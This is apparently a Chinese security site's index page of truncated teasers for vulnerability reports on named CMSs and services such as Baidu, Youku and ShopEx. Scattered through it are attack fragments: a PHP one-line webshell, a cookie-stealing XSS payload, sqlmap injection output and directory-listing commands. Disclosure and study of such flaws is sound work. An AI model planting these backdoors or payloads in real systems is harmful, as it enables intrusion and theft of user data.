WordPress Js-Multi-Hotel 2.2.1 XSS / DoS漏洞 - 网站安全关注热度:19

Hello list! There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress Earlier I wrote about two other vulnerabilities These are Abuse of Functionality, Denia..[详情]

浅析白盒安全审计中的XSS Fliter - 网站安全 - 自学关注热度:9

自己并不擅长xss，作为抛砖引玉的一篇总结文章，分享一下自己的见解，其实写出来感觉很惶恐。都是之前看M写的一些文章学到的姿势，在这里跪谢。我这里的绕过侧重于白盒审计，所..[详情]

360shop淘店通越权操作可获取其他用户敏感信息关注热度:10

360shop 最新版，淘店通2代，可查看，修改任意用户收货地址信息。测试站点为官方最新版演示站：http: zhangheng v2 taodiantong cn测试了官方案例，老版也存在同样注入。我们先在官方最新版..[详情]

瑞和科源智能出卷系统v6.0任意重置密码 - 网站安关注热度:22

重置密码有3个tab页面，分别是输入用户名，输入密码提示问题，设置新密码。步骤2输入密码提示问题可直接跳过http: zncj ncedu gov cn:8100 SelfCfg ResetPassWord aspx输入用户名admin然后直接点击..[详情]

yxcms任意文件删除致可被重新安装 - 网站安全 -关注热度:38

yxcms任意文件删除 导致的重新安装漏洞protected apps members contoller newscontroller phpif (empty($_FILES[ 39;picture 39;][ 39;name 39;]) === false){ $tfile=d..[详情]

百度网盘某处XSS漏洞可获取用户cookie - 网站安全关注热度:23

对于输出过滤不严导致XSS漏洞。首先，要有人评论。然后回复评论。收到通知，打开提醒。然后鼠标hover上去触发。弹个cookie。修复方案：过滤。。..[详情]

伪造修改头信息 XSS盲打得Cookies - 网站安全 - 自学关注热度:23

最近看了一本书，一个老外写的，其中有一篇关于【修改主机头，恶意攻击】【一些CMS的后台,有一个功能,可以显示访问者的客户端信息,比如说访问者的浏览器版本,或者访问者使用的..[详情]

PHP168 6.0及以下版本login.php存重大安全漏洞 - 网站关注热度:19

问题很大，最好不要忽视。。。。利用代码将php木马插入到cache 目录里轻松获得webshell，可批量。利用搜索引擎搜索Powered by php168 v6或者一下版本v5、v4、v3、v2、v1会搜索到很多很多相关的..[详情]

Chrome 是怎么过滤反射型 XSS 的呢？ - 网站安全关注热度:22

首先要说明的是它是webkit的一个模块,而非chrome,所以Safari和360安全浏览器极速模式等webkit内核的浏览器都有XSS过滤功能 过滤方式:通过模糊匹配 输入参数(GET query| POST form data| Location frag..[详情]

如何从网站开发角度提高php安全漏洞的防范 - 网关注热度:14

目前PHP因其功能强大、入门简单、代码执行效率高等优点，成为了Web应用开发的流行语言。由于使用广泛，所以利用PHP安全漏洞对Web网站进行的攻击也越来越多，这给Web应用的安全带来..[详情]

ShopEx分销平台sql注入漏洞导致用户信息泄露 - 网关注热度:48

注入点：http: www fengxiaowang cn:80 article php?aa_id=* (GET)sqlmap identified the following injection points with a total of 184 HTTP(s) requests:---Place: URIParameter: 1*..[详情]

ShopEx短信通系统sql注入（POST） - 网站安全 - 自学关注热度:44

ShopEx无线营销系统，1400多个库网站：http: live shopex cn 注入点http: live shopex cn:80 index php passport passport sel_region (POST)参数p_region_idsqlmap identified the following injection..[详情]

大汉版通JCMS数据库配置文件读取漏洞 - 网站安全关注热度:89

大汉JCMS内容管理系统由于对文件读取时没有对文件路径进行过滤，导致可以直接直接读取数据库配置文件，可导致数据库泄露或者getshell由于读取xml文件时没有对传进的参数进行过滤，..[详情]

新浪邮箱存储型XSS（字符集缺陷） - 网站安全关注热度:14

触发条件比较苛刻，但还是觉得应该提交一下先说一下字符集缺陷的问题 字符集[ISO-2022-KR]会把以 x0E;开头 x0F;结尾的一串字符看作是2 bytes也就是一个字符。换句话来说，它可以帮助我们..[详情]

瑞丽网APP应用API接口又一处注射 - 网站安全 - 自关注热度:26

瑞丽网IPHONE端 APP应用接口存在注入，可能会导致用户信息受到威胁，通过漏洞可以通过变量读取服务器信息，望管理员速度修复,防止被他人恶意利用。POST rlw getTopic php HTTP 1 1Host: api r..[详情]

优酷某分站命令执行漏洞(已证明可内网渗透) -关注热度:26

优酷某分站命令执行漏洞可SHELL，可内网渗透Target: http: channel 3g youku com ykmks login doWhoami: rootWebPath: opt www ykmks webapps ykmksOS Name: LinuxOS Version: 2 6 18-194 el5Java Home:..[详情]

for命令跨目录 读文件 写文件 - 网站安全 - 自学关注热度:15

c for d %i in (D: VirtualHost 8090sec www *) do @echo %i 列目录 c for r D: VirtualHost 8090sec www %i in (* *) do @echo %i 浏览目录 c for f %c in (D: VirtualHo..[详情]

防止.NET木马列所有站物理路径，aspxspy木马简单防关注热度:32

aspxspy 此木马是一个 NET程序制作，如果你的服务器支持 NET那就要注意了，进入木马有个功能叫：IIS Spy，点击以后可以看到所有站点所在的物理路径。以前有很多人提出过，但一直没有人..[详情]

ThinkSNS修改任意账号用户名和密码（包括管理员）关注热度:26

由于某处修改未做判断，导致直接可以修改用户账号信息(包括管理员)更换邮箱激活-修改任何uid的邮箱-登陆-使用修改的那个邮箱找回密码由于index php?app=publicmod=Registeract=changeActivationE..[详情]

PHPCMS最新版存储型xss（附多种利用方法） - 网站关注热度:41

PHPCMS文章投稿处存在存储型的XSS漏洞,也许当你看到标题的时候,你心里会想：楼主简直太不厚道了,不就一个XSS嘛,标题却来个代码执行 别慌,一个漏洞所造成的威胁,本人觉得并不在于其本..[详情]

撞库攻击：一场需要用户参与的持久攻防战 - 网关注热度:29

一、背景：用户数据泄露一直是如今互联网世界的一个焦点，从最近的京东撞库抹黑事件，到之前的CSDN，如家用户数据的泄露，服务商和黑客之间在用户数据这个舞台上一直在进行着旷..[详情]

人人网某分站存储型xss第二弹 - 网站安全 - 自学关注热度:45

存储型xss，可打cookie，引用某牛的话勿头痛医头脚痛医脚详细说明：http: dellcqg renren com Qa ask 单引号被转义构造img src=1 onerror=document body appendChild(document createElement(String fromCh..[详情]

洽洽食品某系统IIS配置不当导致任意代码执行关注热度:25

IIS配置不当致使任意代码执行，旗下多站沦陷，上市公司大量采购、财务数据可查其实问题很简单1 WEB服务器扩展里设置WebDAV为允许2 网站权限配置里开启了写入权限http: iservice qiaqiafoo..[详情]

PHP网站常见安全漏洞和防范措施总结 - 网站安全关注热度:15

目前，基于PHP的网站开发已经成为目前网站开发的主流，本文笔者重点从PHP网站攻击与安全防范方面进行探究，旨在减少网站漏洞，希望对大家有所帮助!一、常见PHP网站安全漏洞对于..[详情]

易想团购开源版#sql注入两个 - 网站安全 - 自学关注热度:21

http: 127 0 0 1 easethink message php?act=if($_REQUEST[ 39;act 39;] == 39;add 39;){if(!$user_info){showErr($GLOBALS[ 39;lang 39;][ 39;PLEASE_LOGIN_FIRST 39;]);}if($_REQUEST[ 39;conten..[详情]

ECSHOP 后台sql注入漏洞2枚（鸡肋） - 网站安全 -关注热度:39

admin affiliate_ck phpif ($_REQUEST[ 39;act 39;] == 39;list 39;){ $logdb = get_affiliate_ck(); $smarty-assign( 39;full_page 39;, 1); $smarty-assign( 39;ur_he..[详情]

建站之星(sitestar)最新版后台GETSHELL - 网站安全关注热度:22

建站之星(sitestar)最新版后台GETSHELL，修改任意文件名。非解析漏洞，利用自带编辑器重命名功能编辑器里选本地上传随意上传一图片木马。选择图片空间。20131211092219_24293 jpg是我刚刚上..[详情]

startbbs开源论坛存储型xss可盲打管理员 - 网站安全关注热度:17

startbbs某处对用户输出过滤不当导致存储型xssstartbbs 采用mvc架构设计。但是在对用户个人资料输入输出过滤不当，导致跨站脚本攻击。1、目标定位在：多个用户可以输入的地方，我拿个..[详情]

易思ESPCMS设计缺陷可登录任意账号 - 网站安全关注热度:25

易思ESPCMS某处设计缺陷（验证过弱）可登录任意用户账号易思ESPCMS cookie存在设计缺陷我看下cookie都有哪些参数ecisp_home_seccodeecisp_member_usernameecisp_member_infofunction member_cookieview($keywo..[详情]

介绍一个奇特的PHP一句话后门 - 网站安全 - 自学关注热度:20

?php *@example http: www myhack58 com shell php?exec=dir@by LUC Team* @print_r(`{$_GET[ 39;exec 39;]}`); 或echo(`{$_GET[ 39;exec 39;]}`);? 当某种情况下众多变异后门均被过滤时，您可尝试一..[详情]